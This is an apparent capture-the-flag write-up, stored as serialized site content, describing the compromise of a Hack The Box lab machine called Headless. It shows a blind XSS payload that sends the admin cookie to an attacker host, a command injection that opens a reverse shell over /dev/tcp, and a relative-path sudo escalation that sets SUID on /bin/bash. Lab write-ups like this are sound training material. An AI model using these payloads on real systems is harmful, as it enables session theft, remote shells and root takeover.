[{"data":1,"prerenderedAt":669},["ShallowReactive",2],{"search":3,"recent-machines":28,"machine-\u002Fmachines\u002Fhtb-headless":35},[4,8,12,16,20,24],{"_path":5,"title":6,"image":7},"\u002Fmachines\u002Fhtb-boardlight","BoardLight","\u002Fimg\u002Fmachines\u002Fhtb-boardlight\u002Fcover.png",{"_path":9,"title":10,"image":11},"\u002Fmachines\u002Fhtb-headless","Headless","\u002Fimg\u002Fmachines\u002Fhtb-headless\u002Fcover.png",{"_path":13,"title":14,"image":15},"\u002Fmachines\u002Fhtb-usage","Usage","\u002Fimg\u002Fmachines\u002Fhtb-usage\u002Fcover.png",{"_path":17,"title":18,"image":19},"\u002Fmachines\u002Fthm-containment","ContAInment","\u002Fimg\u002Fmachines\u002Fthm-containment\u002Fcover.png",{"_path":21,"title":22,"image":23},"\u002Fprojects\u002Fmaddox","Maddox","\u002Fimg\u002Fprojects\u002Fmaddox\u002Fcover.png",{"_path":25,"title":26,"image":27},"\u002Fprojects\u002Fsentinel","Sentinel Password Manager","\u002Fimg\u002Fprojects\u002Fsentinel\u002Fcover.png",[29,31,33,34],{"_path":17,"title":18,"difficulty":30},"Medium",{"_path":13,"title":14,"difficulty":32},"Easy",{"_path":9,"title":10,"difficulty":32},{"_path":5,"title":6,"difficulty":32},{"_path":9,"_dir":36,"_draft":37,"_partial":37,"_locale":38,"title":10,"description":39,"difficulty":32,"platform":40,"os":41,"date":42,"image":11,"tags":43,"body":46,"_type":663,"_id":664,"_source":665,"_file":666,"_stem":667,"_extension":668},"machines",false,"","Easy Linux machine focused on basic web exploitation and straightforward privilege escalation.","HTB","Linux","2026-03-20",[40,41,32,44,45],"Web","Command Injection",{"type":47,"children":48,"toc":657},"root",[49,58,64,114,119,145,151,164,204,224,230,242,292,305,310,398,411,431,437,458,495,515,535,594,606,641,651],{"type":50,"tag":51,"props":52,"children":54},"element","h2",{"id":53},"reconnaissance",[55],{"type":56,"value":57},"text","Reconnaissance",{"type":50,"tag":59,"props":60,"children":61},"p",{},[62],{"type":56,"value":63},"We start with a standard nmap scan:",{"type":50,"tag":65,"props":66,"children":70},"pre",{"className":67,"code":68,"language":69,"meta":38,"style":38},"language-bash shiki shiki-themes github-dark","nmap -sC -sV -oN nmap\u002Finitial 10.10.11.8\n","bash",[71],{"type":50,"tag":72,"props":73,"children":74},"code",{"__ignoreMap":38},[75],{"type":50,"tag":76,"props":77,"children":80},"span",{"class":78,"line":79},"line",1,[81,87,93,98,103,109],{"type":50,"tag":76,"props":82,"children":84},{"style":83},"--shiki-default:#B392F0",[85],{"type":56,"value":86},"nmap",{"type":50,"tag":76,"props":88,"children":90},{"style":89},"--shiki-default:#79B8FF",[91],{"type":56,"value":92}," -sC",{"type":50,"tag":76,"props":94,"children":95},{"style":89},[96],{"type":56,"value":97}," -sV",{"type":50,"tag":76,"props":99,"children":100},{"style":89},[101],{"type":56,"value":102}," -oN",{"type":50,"tag":76,"props":104,"children":106},{"style":105},"--shiki-default:#9ECBFF",[107],{"type":56,"value":108}," nmap\u002Finitial",{"type":50,"tag":76,"props":110,"children":111},{"style":89},[112],{"type":56,"value":113}," 10.10.11.8\n",{"type":50,"tag":59,"props":115,"children":116},{},[117],{"type":56,"value":118},"Ports open:",{"type":50,"tag":120,"props":121,"children":122},"ul",{},[123,135],{"type":50,"tag":124,"props":125,"children":126},"li",{},[127,133],{"type":50,"tag":128,"props":129,"children":130},"strong",{},[131],{"type":56,"value":132},"Port 22",{"type":56,"value":134}," — SSH (OpenSSH)",{"type":50,"tag":124,"props":136,"children":137},{},[138,143],{"type":50,"tag":128,"props":139,"children":140},{},[141],{"type":56,"value":142},"Port 5000",{"type":56,"value":144}," — HTTP (Werkzeug\u002FPython)",{"type":50,"tag":51,"props":146,"children":148},{"id":147},"enumeration",[149],{"type":56,"value":150},"Enumeration",{"type":50,"tag":59,"props":152,"children":153},{},[154,156,162],{"type":56,"value":155},"Visiting port 5000, we see a simple countdown timer. Directory fuzzing reveals a ",{"type":50,"tag":72,"props":157,"children":159},{"className":158},[],[160],{"type":56,"value":161},"\u002Fsupport",{"type":56,"value":163}," endpoint.",{"type":50,"tag":65,"props":165,"children":167},{"className":67,"code":166,"language":69,"meta":38,"style":38},"gobuster dir -u http:\u002F\u002F10.10.11.8:5000 -w \u002Fusr\u002Fshare\u002Fwordlists\u002Fdirb\u002Fcommon.txt\n",[168],{"type":50,"tag":72,"props":169,"children":170},{"__ignoreMap":38},[171],{"type":50,"tag":76,"props":172,"children":173},{"class":78,"line":79},[174,179,184,189,194,199],{"type":50,"tag":76,"props":175,"children":176},{"style":83},[177],{"type":56,"value":178},"gobuster",{"type":50,"tag":76,"props":180,"children":181},{"style":105},[182],{"type":56,"value":183}," dir",{"type":50,"tag":76,"props":185,"children":186},{"style":89},[187],{"type":56,"value":188}," -u",{"type":50,"tag":76,"props":190,"children":191},{"style":105},[192],{"type":56,"value":193}," http:\u002F\u002F10.10.11.8:5000",{"type":50,"tag":76,"props":195,"children":196},{"style":89},[197],{"type":56,"value":198}," -w",{"type":50,"tag":76,"props":200,"children":201},{"style":105},[202],{"type":56,"value":203}," \u002Fusr\u002Fshare\u002Fwordlists\u002Fdirb\u002Fcommon.txt\n",{"type":50,"tag":59,"props":205,"children":206},{},[207,209,214,216,222],{"type":56,"value":208},"The ",{"type":50,"tag":72,"props":210,"children":212},{"className":211},[],[213],{"type":56,"value":161},{"type":56,"value":215}," page contains a form that allows us to submit a message. Inspecting the request, we notice that the ",{"type":50,"tag":72,"props":217,"children":219},{"className":218},[],[220],{"type":56,"value":221},"User-Agent",{"type":56,"value":223}," string is being logged and reflected if it triggers a cross-site scripting (XSS) payload.",{"type":50,"tag":51,"props":225,"children":227},{"id":226},"foothold",[228],{"type":56,"value":229},"Foothold",{"type":50,"tag":59,"props":231,"children":232},{},[233,235,240],{"type":56,"value":234},"By injecting a blind XSS payload into the ",{"type":50,"tag":72,"props":236,"children":238},{"className":237},[],[239],{"type":56,"value":221},{"type":56,"value":241}," header, we can steal the administrator's cookie.",{"type":50,"tag":65,"props":243,"children":245},{"className":67,"code":244,"language":69,"meta":38,"style":38},"curl -X POST http:\u002F\u002F10.10.11.8:5000\u002Fsupport -d \"message=test\" -H \"User-Agent: \u003Cscript>var i=new Image(); i.src='http:\u002F\u002F10.10.14.5\u002F?cookie='+btoa(document.cookie);\u003C\u002Fscript>\"\n",[246],{"type":50,"tag":72,"props":247,"children":248},{"__ignoreMap":38},[249],{"type":50,"tag":76,"props":250,"children":251},{"class":78,"line":79},[252,257,262,267,272,277,282,287],{"type":50,"tag":76,"props":253,"children":254},{"style":83},[255],{"type":56,"value":256},"curl",{"type":50,"tag":76,"props":258,"children":259},{"style":89},[260],{"type":56,"value":261}," -X",{"type":50,"tag":76,"props":263,"children":264},{"style":105},[265],{"type":56,"value":266}," POST",{"type":50,"tag":76,"props":268,"children":269},{"style":105},[270],{"type":56,"value":271}," http:\u002F\u002F10.10.11.8:5000\u002Fsupport",{"type":50,"tag":76,"props":273,"children":274},{"style":89},[275],{"type":56,"value":276}," -d",{"type":50,"tag":76,"props":278,"children":279},{"style":105},[280],{"type":56,"value":281}," \"message=test\"",{"type":50,"tag":76,"props":283,"children":284},{"style":89},[285],{"type":56,"value":286}," -H",{"type":50,"tag":76,"props":288,"children":289},{"style":105},[290],{"type":56,"value":291}," \"User-Agent: \u003Cscript>var i=new Image(); i.src='http:\u002F\u002F10.10.14.5\u002F?cookie='+btoa(document.cookie);\u003C\u002Fscript>\"\n",{"type":50,"tag":59,"props":293,"children":294},{},[295,297,303],{"type":56,"value":296},"We start a local Python HTTP server and quickly receive a callback containing the admin cookie. We then use this cookie to access a hidden ",{"type":50,"tag":72,"props":298,"children":300},{"className":299},[],[301],{"type":56,"value":302},"\u002Fdashboard",{"type":56,"value":304}," that we couldn't reach before.",{"type":50,"tag":59,"props":306,"children":307},{},[308],{"type":56,"value":309},"On the dashboard, there's a feature to generate reports. This feature is vulnerable to Command Injection. We construct a payload to spawn a reverse shell:",{"type":50,"tag":65,"props":311,"children":313},{"className":67,"code":312,"language":69,"meta":38,"style":38},"POST \u002Fdashboard HTTP\u002F1.1\nCookie: admin=...\n\ndate=2026-03-20;bash -c 'bash -i >& \u002Fdev\u002Ftcp\u002F10.10.14.5\u002F4444 0>&1'\n",[314],{"type":50,"tag":72,"props":315,"children":316},{"__ignoreMap":38},[317,335,349,359],{"type":50,"tag":76,"props":318,"children":319},{"class":78,"line":79},[320,325,330],{"type":50,"tag":76,"props":321,"children":322},{"style":83},[323],{"type":56,"value":324},"POST",{"type":50,"tag":76,"props":326,"children":327},{"style":105},[328],{"type":56,"value":329}," \u002Fdashboard",{"type":50,"tag":76,"props":331,"children":332},{"style":105},[333],{"type":56,"value":334}," HTTP\u002F1.1\n",{"type":50,"tag":76,"props":336,"children":338},{"class":78,"line":337},2,[339,344],{"type":50,"tag":76,"props":340,"children":341},{"style":83},[342],{"type":56,"value":343},"Cookie:",{"type":50,"tag":76,"props":345,"children":346},{"style":105},[347],{"type":56,"value":348}," admin=...\n",{"type":50,"tag":76,"props":350,"children":352},{"class":78,"line":351},3,[353],{"type":50,"tag":76,"props":354,"children":356},{"emptyLinePlaceholder":355},true,[357],{"type":56,"value":358},"\n",{"type":50,"tag":76,"props":360,"children":362},{"class":78,"line":361},4,[363,369,375,379,384,388,393],{"type":50,"tag":76,"props":364,"children":366},{"style":365},"--shiki-default:#E1E4E8",[367],{"type":56,"value":368},"date",{"type":50,"tag":76,"props":370,"children":372},{"style":371},"--shiki-default:#F97583",[373],{"type":56,"value":374},"=",{"type":50,"tag":76,"props":376,"children":377},{"style":105},[378],{"type":56,"value":42},{"type":50,"tag":76,"props":380,"children":381},{"style":365},[382],{"type":56,"value":383},";",{"type":50,"tag":76,"props":385,"children":386},{"style":83},[387],{"type":56,"value":69},{"type":50,"tag":76,"props":389,"children":390},{"style":89},[391],{"type":56,"value":392}," -c",{"type":50,"tag":76,"props":394,"children":395},{"style":105},[396],{"type":56,"value":397}," 'bash -i >& \u002Fdev\u002Ftcp\u002F10.10.14.5\u002F4444 0>&1'\n",{"type":50,"tag":59,"props":399,"children":400},{},[401,403,409],{"type":56,"value":402},"We catch the shell as ",{"type":50,"tag":72,"props":404,"children":406},{"className":405},[],[407],{"type":56,"value":408},"dvir",{"type":56,"value":410},". Grabbing the user flag:",{"type":50,"tag":65,"props":412,"children":414},{"className":67,"code":413,"language":69,"meta":38,"style":38},"cat \u002Fhome\u002Fdvir\u002Fuser.txt\n",[415],{"type":50,"tag":72,"props":416,"children":417},{"__ignoreMap":38},[418],{"type":50,"tag":76,"props":419,"children":420},{"class":78,"line":79},[421,426],{"type":50,"tag":76,"props":422,"children":423},{"style":83},[424],{"type":56,"value":425},"cat",{"type":50,"tag":76,"props":427,"children":428},{"style":105},[429],{"type":56,"value":430}," \u002Fhome\u002Fdvir\u002Fuser.txt\n",{"type":50,"tag":51,"props":432,"children":434},{"id":433},"privilege-escalation",[435],{"type":56,"value":436},"Privilege Escalation",{"type":50,"tag":59,"props":438,"children":439},{},[440,442,448,450,456],{"type":56,"value":441},"Checking ",{"type":50,"tag":72,"props":443,"children":445},{"className":444},[],[446],{"type":56,"value":447},"sudo -l",{"type":56,"value":449},", we see that the user can execute ",{"type":50,"tag":72,"props":451,"children":453},{"className":452},[],[454],{"type":56,"value":455},"\u002Fusr\u002Fbin\u002Fsyscheck",{"type":56,"value":457}," without a password.",{"type":50,"tag":65,"props":459,"children":461},{"className":67,"code":460,"language":69,"meta":38,"style":38},"sudo -l\n# User dvir may run the following commands on headless:\n#    (ALL) NOPASSWD: \u002Fusr\u002Fbin\u002Fsyscheck\n",[462],{"type":50,"tag":72,"props":463,"children":464},{"__ignoreMap":38},[465,478,487],{"type":50,"tag":76,"props":466,"children":467},{"class":78,"line":79},[468,473],{"type":50,"tag":76,"props":469,"children":470},{"style":83},[471],{"type":56,"value":472},"sudo",{"type":50,"tag":76,"props":474,"children":475},{"style":89},[476],{"type":56,"value":477}," -l\n",{"type":50,"tag":76,"props":479,"children":480},{"class":78,"line":337},[481],{"type":50,"tag":76,"props":482,"children":484},{"style":483},"--shiki-default:#6A737D",[485],{"type":56,"value":486},"# User dvir may run the following commands on headless:\n",{"type":50,"tag":76,"props":488,"children":489},{"class":78,"line":351},[490],{"type":50,"tag":76,"props":491,"children":492},{"style":483},[493],{"type":56,"value":494},"#    (ALL) NOPASSWD: \u002Fusr\u002Fbin\u002Fsyscheck\n",{"type":50,"tag":59,"props":496,"children":497},{},[498,500,505,507,513],{"type":56,"value":499},"Looking at ",{"type":50,"tag":72,"props":501,"children":503},{"className":502},[],[504],{"type":56,"value":455},{"type":56,"value":506},", it's a bash script that executes ",{"type":50,"tag":72,"props":508,"children":510},{"className":509},[],[511],{"type":56,"value":512},"initdb.sh",{"type":56,"value":514}," using a relative path without specifying an absolute directory.",{"type":50,"tag":59,"props":516,"children":517},{},[518,520,525,527,533],{"type":56,"value":519},"We can exploit this by creating a malicious ",{"type":50,"tag":72,"props":521,"children":523},{"className":522},[],[524],{"type":56,"value":512},{"type":56,"value":526}," in our current directory, making it executable, and running ",{"type":50,"tag":72,"props":528,"children":530},{"className":529},[],[531],{"type":56,"value":532},"sudo \u002Fusr\u002Fbin\u002Fsyscheck",{"type":56,"value":534},".",{"type":50,"tag":65,"props":536,"children":538},{"className":67,"code":537,"language":69,"meta":38,"style":38},"echo \"chmod +s \u002Fbin\u002Fbash\" > initdb.sh\nchmod +x initdb.sh\nsudo \u002Fusr\u002Fbin\u002Fsyscheck\n",[539],{"type":50,"tag":72,"props":540,"children":541},{"__ignoreMap":38},[542,565,582],{"type":50,"tag":76,"props":543,"children":544},{"class":78,"line":79},[545,550,555,560],{"type":50,"tag":76,"props":546,"children":547},{"style":89},[548],{"type":56,"value":549},"echo",{"type":50,"tag":76,"props":551,"children":552},{"style":105},[553],{"type":56,"value":554}," \"chmod +s \u002Fbin\u002Fbash\"",{"type":50,"tag":76,"props":556,"children":557},{"style":371},[558],{"type":56,"value":559}," >",{"type":50,"tag":76,"props":561,"children":562},{"style":105},[563],{"type":56,"value":564}," initdb.sh\n",{"type":50,"tag":76,"props":566,"children":567},{"class":78,"line":337},[568,573,578],{"type":50,"tag":76,"props":569,"children":570},{"style":83},[571],{"type":56,"value":572},"chmod",{"type":50,"tag":76,"props":574,"children":575},{"style":105},[576],{"type":56,"value":577}," +x",{"type":50,"tag":76,"props":579,"children":580},{"style":105},[581],{"type":56,"value":564},{"type":50,"tag":76,"props":583,"children":584},{"class":78,"line":351},[585,589],{"type":50,"tag":76,"props":586,"children":587},{"style":83},[588],{"type":56,"value":472},{"type":50,"tag":76,"props":590,"children":591},{"style":105},[592],{"type":56,"value":593}," \u002Fusr\u002Fbin\u002Fsyscheck\n",{"type":50,"tag":59,"props":595,"children":596},{},[597,599,605],{"type":56,"value":598},"The script executes our payload, setting the SUID bit on ",{"type":50,"tag":72,"props":600,"children":602},{"className":601},[],[603],{"type":56,"value":604},"\u002Fbin\u002Fbash",{"type":56,"value":534},{"type":50,"tag":65,"props":607,"children":609},{"className":67,"code":608,"language":69,"meta":38,"style":38},"\u002Fbin\u002Fbash -p\nwhoami\n# root\n",[610],{"type":50,"tag":72,"props":611,"children":612},{"__ignoreMap":38},[613,625,633],{"type":50,"tag":76,"props":614,"children":615},{"class":78,"line":79},[616,620],{"type":50,"tag":76,"props":617,"children":618},{"style":83},[619],{"type":56,"value":604},{"type":50,"tag":76,"props":621,"children":622},{"style":89},[623],{"type":56,"value":624}," -p\n",{"type":50,"tag":76,"props":626,"children":627},{"class":78,"line":337},[628],{"type":50,"tag":76,"props":629,"children":630},{"style":83},[631],{"type":56,"value":632},"whoami\n",{"type":50,"tag":76,"props":634,"children":635},{"class":78,"line":351},[636],{"type":50,"tag":76,"props":637,"children":638},{"style":483},[639],{"type":56,"value":640},"# root\n",{"type":50,"tag":59,"props":642,"children":643},{},[644,649],{"type":50,"tag":128,"props":645,"children":646},{},[647],{"type":56,"value":648},"Root flag captured!",{"type":56,"value":650}," 🏴",{"type":50,"tag":652,"props":653,"children":654},"style",{},[655],{"type":56,"value":656},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":38,"searchDepth":337,"depth":337,"links":658},[659,660,661,662],{"id":53,"depth":337,"text":57},{"id":147,"depth":337,"text":150},{"id":226,"depth":337,"text":229},{"id":433,"depth":337,"text":436},"markdown","content:machines:htb-headless.md","content","machines\u002Fhtb-headless.md","machines\u002Fhtb-headless","md",1777047342251]